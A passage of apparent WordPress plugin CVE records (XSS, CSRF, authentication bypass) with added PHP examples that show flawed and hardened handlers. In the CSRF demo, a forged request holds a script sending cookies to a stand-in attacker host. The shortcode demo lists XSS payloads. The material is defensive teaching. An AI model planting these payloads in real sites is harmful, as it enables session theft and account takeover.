            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-05T02:26:54.536Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/491c7680-d270-41ed-a756-9397a0bd86bc?source=cve"
        },
        {
          "url": "https://wordpress.org/plugins/charts-ninja-graphs-and-charts"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/charts-ninja-graphs-and-charts/tags/2.1.0/chartsninja.php#L24"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/charts-ninja-graphs-and-charts/trunk/chartsninja.php#L24"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-05-04T14:07:54.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "Charts Ninja: Create Beautiful Graphs \u0026 Charts and Easily Add Them to Your Website \u003c= 2.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via \u0027chartid\u0027 Shortcode Attribute"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-4730",
    "datePublished": "2026-05-05T02:26:54.536Z",
    "dateReserved": "2026-03-23T23:26:58.201Z",
    "dateUpdated": "2026-05-05T02:26:54.536Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}
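Every record on this page carries the same `affected[].versions[]` shape (`"version": "0"`, `"lessThanOrEqual"`, `"versionType": "semver"`, `"defaultStatus": "unaffected"`), so a site operator can triage a feed like this mechanically instead of reading each title. The script below is an added example, not code from this page, from Wordfence or from any plugin vendor: it loads a cvelistv5 record (a trimmed copy of the CVE-2026-4730 record above, embedded inline and keeping only the fields read), extracts the affected range and compares it with PHP's `version_compare()` against a constructed plugin inventory. The product-name-to-slug table is an assumption the script makes explicit: records name the product as the CNA wrote it, not the wordpress.org slug, so that mapping has to be maintained by whoever runs the check.

```php
<?php
// Added example (not from the page or any vendor): triage cvelistv5 records
// against an installed-plugin inventory. Trimmed copy of the CVE-2026-4730
// record shown above; only the fields this script reads are kept.
const RECORD_JSON = <<<'JSON'
{
  "cveMetadata": {"cveId": "CVE-2026-4730"},
  "containers": {"cna": {
    "title": "Charts Ninja <= 2.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'chartid' Shortcode Attribute",
    "affected": [{
      "vendor": "commonninja",
      "product": "Charts Ninja: Create Beautiful Graphs & Charts and Easily Add Them to Your Website",
      "defaultStatus": "unaffected",
      "versions": [{"version": "0", "lessThanOrEqual": "2.1.0", "status": "affected", "versionType": "semver"}]
    }],
    "metrics": [{"cvssV3_1": {"baseScore": 6.4, "baseSeverity": "MEDIUM"}}]
  }}
}
JSON;

// Assumed mapping from CNA product names to wordpress.org plugin slugs.
// Records carry the product name, not the slug; maintain this table yourself
// (the wordpress.org reference URL in each record is the usual source).
const PRODUCT_TO_SLUG = [
    'Charts Ninja: Create Beautiful Graphs & Charts and Easily Add Them to Your Website'
        => 'charts-ninja-graphs-and-charts',
];

// Constructed inventory: slug => installed version, e.g. from
// `wp plugin list --format=json` on the target site.
const INVENTORY = [
    'charts-ninja-graphs-and-charts' => '2.0.3',
    'some-other-plugin'              => '1.4.0',
];

/** True if $installed falls inside one cvelistv5 version-range object. */
function version_in_range(string $installed, array $range): bool
{
    if (($range['status'] ?? '') !== 'affected') {
        return false;
    }
    // "0" means "from the first release"; otherwise the range starts here.
    $lower = $range['version'] ?? '0';
    if ($lower !== '0' && version_compare($installed, $lower, '<')) {
        return false;
    }
    if (isset($range['lessThanOrEqual'])) {
        return version_compare($installed, $range['lessThanOrEqual'], '<=');
    }
    if (isset($range['lessThan'])) {
        return version_compare($installed, $range['lessThan'], '<');
    }
    // A bare 'version' with no upper bound names a single affected version.
    return version_compare($installed, $lower, '==');
}

/** Match one record against the inventory: slug => [cve, title, score]. */
function triage_record(string $json, array $inventory, array $slugs): array
{
    $rec  = json_decode($json, true, 512, JSON_THROW_ON_ERROR);
    $cna  = $rec['containers']['cna'];
    $hits = [];
    foreach ($cna['affected'] as $aff) {
        $slug = $slugs[$aff['product']] ?? null;
        if ($slug === null || !isset($inventory[$slug])) {
            continue;   // not installed, or no slug mapping yet: report that separately
        }
        foreach ($aff['versions'] as $range) {
            if (version_in_range($inventory[$slug], $range)) {
                $hits[$slug] = [
                    'cve'   => $rec['cveMetadata']['cveId'],
                    'title' => $cna['title'],
                    'score' => $cna['metrics'][0]['cvssV3_1']['baseScore'] ?? null,
                ];
            }
        }
    }
    return $hits;
}

foreach (triage_record(RECORD_JSON, INVENTORY, PRODUCT_TO_SLUG) as $slug => $hit) {
    printf("%s %s (CVSS %s): %s\n", $hit['cve'], $slug, $hit['score'], $hit['title']);
}
```

Two caveats a practitioner should keep in mind. `version_compare()` orders pre-release suffixes (`1.0-beta`, `1.0RC1`) by its own rules, so check any plugin pinned to a pre-release by hand. And because `defaultStatus` is `unaffected`, the records here state only the last affected version, not the fixed one; the fixed release is whatever the vendor shipped next, which the changeset or changelog links in each record's `references` identify.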

CVE-2026-6701 (GCVE-0-2026-6701)

Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
Title
addfreespace <= 0.1.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting via Settings Page
Summary
The addfreespace plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.1.3. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
CWE
  • CWE-352 - Cross-Site Request Forgery (CSRF)
Assigner
Impacted products
Vendor: kazunii
Product: addfreespace
Versions: affected from 0 to ≤ 0.1.3 (semver)
Credits
Muhammad Nur Ibnu Hubab

{
  "containers": {
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "addfreespace",
          "vendor": "kazunii",
          "versions": [
            {
              "lessThanOrEqual": "0.1.3",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Muhammad Nur Ibnu Hubab"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The addfreespace plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.1.3. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-352",
              "description": "CWE-352 Cross-Site Request Forgery (CSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-05T02:26:54.012Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/40eaeb28-c721-4977-951d-582b7dc2bd12?source=cve"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/addfreespace/trunk/addfreespace.php#L45"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/addfreespace/tags/0.1.3/addfreespace.php#L45"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/addfreespace/trunk/addfreespace_functions.php#L30"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/addfreespace/tags/0.1.3/addfreespace_functions.php#L30"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/addfreespace/trunk/addfreespace_functions.php#L59"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/addfreespace/tags/0.1.3/addfreespace_functions.php#L59"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/addfreespace/trunk/addfreespace.php#L312"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/addfreespace/tags/0.1.3/addfreespace.php#L312"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/addfreespace/trunk/addfreespace_functions.php#L83"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/addfreespace/tags/0.1.3/addfreespace_functions.php#L83"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-05-04T14:07:04.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "addfreespace \u003c= 0.1.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting via Settings Page"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-6701",
    "datePublished": "2026-05-05T02:26:54.012Z",
    "dateReserved": "2026-04-20T17:28:17.779Z",
    "dateUpdated": "2026-05-05T02:26:54.012Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}
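The addfreespace record describes the classic shape of a WordPress CSRF-to-stored-XSS chain: a settings handler that reacts to any POST carrying its field, with no nonce tying the request to the plugin's own form, and a stored value that is later echoed into pages. The following is an added example, not addfreespace code: a hypothetical options-save handler (option name `example_footer_html` and nonce action `example_save_settings` are invented for illustration) in its CSRF-able form beside a hardened one. The `if (!function_exists(...))` shims are stand-ins so the file runs outside WordPress; inside a plugin the real functions are used.

```php
<?php
// Added example, not addfreespace code: an options-save handler as a plugin
// might hook to admin_init, in a CSRF-able form and a hardened form.
// Option and nonce action names are hypothetical. The shims below let the
// file run outside WordPress; in a plugin the real functions are used.
$GLOBALS['wp_options'] = [];
$GLOBALS['sim'] = ['logged_in_admin' => true, 'nonce_ok' => false];

if (!function_exists('update_option')) {
    function update_option(string $name, $value): bool
    {
        $GLOBALS['wp_options'][$name] = $value;
        return true;
    }
}
if (!function_exists('current_user_can')) {
    function current_user_can(string $cap): bool
    {
        return $GLOBALS['sim']['logged_in_admin'];
    }
}
if (!function_exists('wp_verify_nonce')) {
    // The real wp_verify_nonce() ties the nonce to user, session and action
    // and returns 1, 2 or false; the stand-in reports the simulated state.
    function wp_verify_nonce(string $nonce, string $action)
    {
        return $GLOBALS['sim']['nonce_ok'] ? 1 : false;
    }
}
if (!function_exists('wp_kses_post')) {
    // Crude stand-in: the real wp_kses_post() keeps post-safe tags and strips
    // event-handler attributes; strip_tags() does not strip attributes.
    function wp_kses_post(string $html): string
    {
        return strip_tags($html, '<p><a><strong><em><br>');
    }
}

// Vulnerable: any POST carrying the field is honoured. A logged-in admin
// whose browser is made to submit a cross-site form (an auto-submitting
// <form> on an attacker page) rewrites the option, and the raw value is
// later echoed into every page.
function save_settings_vulnerable(array $post): bool
{
    if (!isset($post['example_footer_html'])) {
        return false;
    }
    return update_option('example_footer_html', (string) $post['example_footer_html']);
}

// Hardened: nonce (the request came from our own form), capability (the
// caller may change site settings), sanitisation (the stored value is
// bounded), in that order. Escape again where the option is printed.
function save_settings_hardened(array $post): bool
{
    if (!isset($post['example_footer_html'])) {
        return false;
    }
    if (!wp_verify_nonce((string) ($post['_wpnonce'] ?? ''), 'example_save_settings')) {
        return false;   // in WordPress: check_admin_referer('example_save_settings')
    }
    if (!current_user_can('manage_options')) {
        return false;
    }
    return update_option('example_footer_html', wp_kses_post((string) $post['example_footer_html']));
}

// Constructed forged request: the victim's browser attaches its cookies, but
// the attacker's page cannot know the nonce, so none is present.
$forged = [
    'example_footer_html' => '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
];

echo 'vulnerable handler accepted: ', save_settings_vulnerable($forged) ? 'yes' : 'no', "\n";
echo 'hardened handler accepted:   ', save_settings_hardened($forged) ? 'yes' : 'no', "\n";
echo 'stored option: ', var_export($GLOBALS['wp_options'], true), "\n";
```

The record's wording "missing or incorrect nonce validation" covers two failure modes worth grepping for in a review: no nonce at all, and a nonce that is generated in the form but never verified in the handler (or verified with `isset($_POST['_wpnonce'])` rather than `wp_verify_nonce()` / `check_admin_referer()`). The nonce check must come before the capability check has any value: a forged request from an administrator's browser passes `current_user_can()` on its own.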

CVE-2026-5722 (GCVE-0-2026-5722)

Vulnerability from cvelistv5 – Published: 2026-05-05 01:24 – Updated: 2026-05-05 01:24
Title
MoreConvert Pro <= 1.9.14 - Authentication Bypass via Waitlist Guest Verification Token Reuse
Summary
The MoreConvert Pro plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.9.14. This is due to the guest waitlist verification flow not invalidating or regenerating verification tokens when the customer email address is changed. This makes it possible for unauthenticated attackers to authenticate as existing users, including administrators, by obtaining a valid guest verification token for an attacker-controlled email, changing the same guest customer email to the target account email through the public waitlist flow, and then using the original verification link.
CWE
  • CWE-287 - Improper Authentication
Assigner
Impacted products
Vendor: MoreConvert
Product: MoreConvert Pro
Versions: affected from 0 to ≤ 1.9.14 (semver)
Credits
Nguyen Ngoc Duc

{
  "containers": {
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "MoreConvert Pro",
          "vendor": "MoreConvert",
          "versions": [
            {
              "lessThanOrEqual": "1.9.14",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Nguyen Ngoc Duc"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The MoreConvert Pro plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.9.14. This is due to the guest waitlist verification flow not invalidating or regenerating verification tokens when the customer email address is changed. This makes it possible for unauthenticated attackers to authenticate as existing users, including administrators, by obtaining a valid guest verification token for an attacker-controlled email, changing the same guest customer email to the target account email through the public waitlist flow, and then using the original verification link."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-287",
              "description": "CWE-287 Improper Authentication",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-05T01:24:36.485Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fe887475-f7e8-4fda-a793-bc6f37b70f3e?source=cve"
        },
        {
          "url": "https://wordpress.org/plugins/smart-wishlist-for-more-convert/"
        },
        {
          "url": "https://moreconvert.com/changelog/"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-04-23T12:13:10.000Z",
          "value": "Vendor Notified"
        },
        {
          "lang": "en",
          "time": "2026-05-04T13:18:12.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "MoreConvert Pro \u003c= 1.9.14 - Authentication Bypass via Waitlist Guest Verification Token Reuse"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-5722",
    "datePublished": "2026-05-05T01:24:36.485Z",
    "dateReserved": "2026-04-06T20:32:04.084Z",
    "dateUpdated": "2026-05-05T01:24:36.485Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}
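The MoreConvert Pro record is a logic flaw rather than a missing check: a verification token is issued for one address, the address is changed through the same public flow, and the token is still honoured against the new address. The model below is an added example, not MoreConvert code: a minimal guest waitlist whose verification link can log a visitor in, run once with the flawed behaviour and once with the fix. The users table, the "login" result and the e-mail addresses are constructed stand-ins; it needs PHP 8 for the constructor promotion.

```php
<?php
// Added example, not MoreConvert code: a minimal model of a guest waitlist
// whose verification link can log a visitor in, showing the token-reuse flaw
// the record describes beside the fix. Users, "login" result and addresses
// are constructed stand-ins. Requires PHP 8.
final class Waitlist
{
    /** @var array<int, array{email:string, token_hash:string, issued_for:string}> */
    private array $guests = [];

    /** e-mail => login name of an existing account (constructed) */
    private array $users = ['admin@site.example' => 'admin', 'bob@site.example' => 'bob'];

    public function __construct(private bool $hardened) {}

    // A guest joins, or re-submits with a different address. Returns the raw
    // token that would be mailed to the address on file, or null if no mail
    // is sent.
    public function subscribe(int $guest_id, string $email): ?string
    {
        $email = strtolower(trim($email));
        if (isset($this->guests[$guest_id]) && !$this->hardened) {
            // Flaw: the address changes but the outstanding token survives,
            // so a link delivered to the old address now verifies the new one.
            $this->guests[$guest_id]['email'] = $email;
            return null;
        }
        // Fix: any change re-issues the token (the old hash is discarded) and
        // the token is bound to the address it was mailed to. Only a hash of
        // the token is stored, so a database read does not yield usable links.
        $token = bin2hex(random_bytes(32));
        $this->guests[$guest_id] = [
            'email'      => $email,
            'token_hash' => hash('sha256', $token),
            'issued_for' => $email,
        ];
        return $token;
    }

    // Verification-link handler. Returns the login name the request ends up
    // authenticated as, or null.
    public function verify(string $token): ?string
    {
        $hash = hash('sha256', $token);
        foreach ($this->guests as $guest) {
            if (!hash_equals($guest['token_hash'], $hash)) {
                continue;
            }
            // Fix, second layer: the address being verified must be the one
            // the token was issued for, even if some other code path edited it.
            if ($this->hardened && $guest['issued_for'] !== $guest['email']) {
                return null;
            }
            return $this->users[$guest['email']] ?? null;
        }
        return null;
    }
}

// Constructed attack sequence from the record: obtain a token for an
// attacker-controlled address, change the same guest's address to the
// target's through the public flow, then reuse the original link.
foreach ([false, true] as $hardened) {
    $wl    = new Waitlist($hardened);
    $token = $wl->subscribe(1, 'attacker@evil.example');   // link mailed to attacker
    $wl->subscribe(1, 'admin@site.example');               // same guest, new address
    printf("%-8s original link authenticates as: %s\n",
        $hardened ? 'hardened' : 'flawed', $wl->verify($token) ?? 'nobody');
}
```

The token fix is necessary but the design point sits one level up: a waitlist link only proves that someone could read mail at the address the link was sent to, at the time it was sent. Turning that into a session for a pre-existing account is a privilege step, and the CVSS 9.8 here reflects that the account can be an administrator. If the feature must log users in, it should do so only for the address the token was issued to, make tokens single-use with a short expiry, and never let a guest record be re-pointed at an address that already belongs to a registered user without that user's own verification.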

CVE-2026-5063 (GCVE-0-2026-5063)

Vulnerability from cvelistv5 – Published: 2026-05-03 04:25 – Updated: 2026-05-04 17:51
Title
NEX-Forms <= 9.1.11 - Unauthenticated Stored Cross-Site Scripting via POST Parameter Key Names
Summary
The NEX-Forms – Ultimate Forms Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via POST parameter key names in the submit_nex_form() function in versions up to, and including, 9.1.11 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
CWE
  • CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
Impacted products
Credits
Naoya Takahashi

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-5063",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-04T16:14:51.881123Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-04T17:51:02.708Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "NEX-Forms \u2013 Ultimate Forms Plugin for WordPress",
          "vendor": "webaways",
          "versions": [
            {
              "lessThanOrEqual": "9.1.11",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Naoya Takahashi"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The NEX-Forms \u2013 Ultimate Forms Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via POST parameter key names in the submit_nex_form() function in versions up to, and including, 9.1.11 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-03T04:25:49.917Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9bac82ee-55bf-4381-b441-115a675e4834?source=cve"
        },
        {
          "url": "https://plugins.trac.wordpress.org/changeset/3513524/nex-forms-express-wp-form-builder"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-03-27T20:33:32.000Z",
          "value": "Vendor Notified"
        },
        {
          "lang": "en",
          "time": "2026-05-02T15:41:51.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "NEX-Forms \u003c= 9.1.11 - Unauthenticated Stored Cross-Site Scripting via POST Parameter Key Names"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-5063",
    "datePublished": "2026-05-03T04:25:49.917Z",
    "dateReserved": "2026-03-27T20:10:36.015Z",
    "dateUpdated": "2026-05-04T17:51:02.708Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-0703 (GCVE-0-2026-0703)

Vulnerability from cvelistv5 – Published: 2026-05-02 13:26 – Updated: 2026-05-04 17:13
Title
NextMove Lite - Thank You Page for WooCommerce <= 2.23.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'xlwcty_current_date' Shortcode
Summary
The NextMove Lite – Thank You Page for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'xlwcty_current_date' shortcode in all versions up to, and including, 2.23.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
CWE
  • CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
Impacted products
Credits
Muhammad Yudha - DJ

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-0703",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-04T17:13:00.242519Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-04T17:13:09.712Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "NextMove Lite \u2013 Thank You Page for WooCommerce",
          "vendor": "xlplugins",
          "versions": [
            {
              "lessThanOrEqual": "2.23.0",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Muhammad Yudha - DJ"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The NextMove Lite \u2013 Thank You Page for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin\u0027s \u0027xlwcty_current_date\u0027 shortcode in all versions up to, and including, 2.23.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 6.4,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-02T13:26:10.078Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a8eab201-04a5-43df-bb9b-2964c50a1833?source=cve"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/woo-thank-you-page-nextmove-lite/tags/2.23.0/merge-tags/xlwcty-shortcode-merge-tags.php#L79"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/woo-thank-you-page-nextmove-lite/tags/2.23.0/merge-tags/xlwcty-shortcode-merge-tags.php#L87"
        },
        {
          "url": "https://plugins.trac.wordpress.org/changeset/3482613/"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-01-08T01:23:35.000Z",
          "value": "Vendor Notified"
        },
        {
          "lang": "en",
          "time": "2026-05-01T00:00:00.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "NextMove Lite - Thank You Page for WooCommerce \u003c= 2.23.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via \u0027xlwcty_current_date\u0027 Shortcode"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-0703",
    "datePublished": "2026-05-02T13:26:10.078Z",
    "dateReserved": "2026-01-08T01:07:52.291Z",
    "dateUpdated": "2026-05-04T17:13:09.712Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}
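The Charts Ninja (`chartid`) and NextMove Lite (`xlwcty_current_date`) records above are the same bug class: a shortcode attribute written by a Contributor is dropped into the rendered markup without being constrained to its expected type or escaped for the context it lands in. The following is an added example, not code from either plugin: a hypothetical `[chart]` shortcode callback that concatenates its attributes raw, beside a hardened version. The attribute names `chartid` (a numeric identifier) and `format` (free text, standing in for a date-format style attribute) are assumptions for illustration; the `function_exists` shims stand in for the WordPress helpers so the file runs on its own.

```php
<?php
// Added example, not Charts Ninja or NextMove code: a shortcode callback that
// prints a user-supplied attribute unescaped, beside a hardened version.
// Shims so the file runs outside WordPress; in a plugin use the real ones.
if (!function_exists('esc_attr')) {
    function esc_attr(string $text): string
    {
        return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('shortcode_atts')) {
    // Keeps only the attribute names the shortcode declares, filling defaults.
    function shortcode_atts(array $pairs, array $atts): array
    {
        return array_merge($pairs, array_intersect_key($atts, $pairs));
    }
}

// Vulnerable: the raw attribute value is concatenated into an HTML attribute.
// A Contributor's post containing
//   [chart chartid='1" onmouseover="alert(document.cookie)']
// is stored as-is and rendered for whoever views or previews the post,
// typically the Editor or Administrator reviewing the draft.
function chart_shortcode_vulnerable(array $atts): string
{
    $id = $atts['chartid'] ?? '';
    return '<div class="chart" data-chartid="' . $id . '"></div>';
}

// Hardened: declare the attributes, coerce each to its expected type, and
// escape free text for the exact output context (an attribute value here).
function chart_shortcode_hardened(array $atts): string
{
    $atts = shortcode_atts(['chartid' => '0', 'format' => 'Y-m-d'], $atts);
    $id   = (int) $atts['chartid'];       // identifier: a number or nothing
    $fmt  = esc_attr($atts['format']);    // free text: escaped, never trusted
    return '<div class="chart" data-chartid="' . $id . '" data-format="' . $fmt . '"></div>';
}

// Constructed payloads of the kind a Contributor can place in post content.
$payloads = [
    ['chartid' => '1" onmouseover="alert(1)'],
    ['chartid' => '7', 'format' => '"><img src=x onerror=alert(1)>'],
];
foreach ($payloads as $p) {
    echo 'vulnerable: ', chart_shortcode_vulnerable($p), "\n";
    echo 'hardened:   ', chart_shortcode_hardened($p), "\n\n";
}
```

When reviewing a plugin for this class, the quick check is every `add_shortcode()` callback: each `$atts[...]` read should pass through `shortcode_atts()` and then a type cast or the escaping function matching where it is printed (`esc_attr()` inside attributes, `esc_html()` in text, `esc_url()` in `href`/`src`, `wp_json_encode()` inside inline script). Escaping chosen for the wrong context, such as `esc_html()` on a value that lands inside an attribute, is the common near-miss.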

CVE-2026-2554 (GCVE-0-2026-2554)

Vulnerability from cvelistv5 – Published: 2026-05-02 13:26 – Updated: 2026-05-05 00:28
Title
